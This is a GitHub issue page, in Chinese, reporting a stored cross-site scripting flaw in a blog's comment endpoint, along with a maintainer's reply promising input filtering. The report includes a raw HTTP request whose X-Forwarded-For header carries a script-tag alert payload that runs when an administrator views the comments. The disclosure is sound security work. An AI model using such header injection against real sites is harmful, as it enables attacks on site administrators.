We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
发一个HTTP请求如下:
POST /post/addComment HTTP/1.1 Host: hostname.cc:8080 Content-Length: 87 Cache-Control: max-age=0 Origin: http://hostname.cc:8080 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3 Referer: http://x.cc:8080/post/hello-world Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 X-forwarded-for:<script>alert('xss')</script> Connection: close
userComment=asd&userName=asd&userMail=asd&webHome=asd&submit=%E6%8F%90%E4%BA%A4&logId=1
后台查看评论列表就直接触发了.
这里获取header头IP时进行过滤下.
The text was updated successfully, but these errors were encountered:
统一用户能对入库的数据进行过滤
Sorry, something went wrong.
b921c1a
No branches or pull requests
发一个HTTP请求如下:
POST /post/addComment HTTP/1.1
Host: hostname.cc:8080
Content-Length: 87
Cache-Control: max-age=0
Origin: http://hostname.cc:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3
Referer: http://x.cc:8080/post/hello-world
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
X-forwarded-for:<script>alert('xss')</script>
Connection: close
userComment=asd&userName=asd&userMail=asd&webHome=asd&submit=%E6%8F%90%E4%BA%A4&logId=1
后台查看评论列表就直接触发了.
这里获取header头IP时进行过滤下.
The text was updated successfully, but these errors were encountered: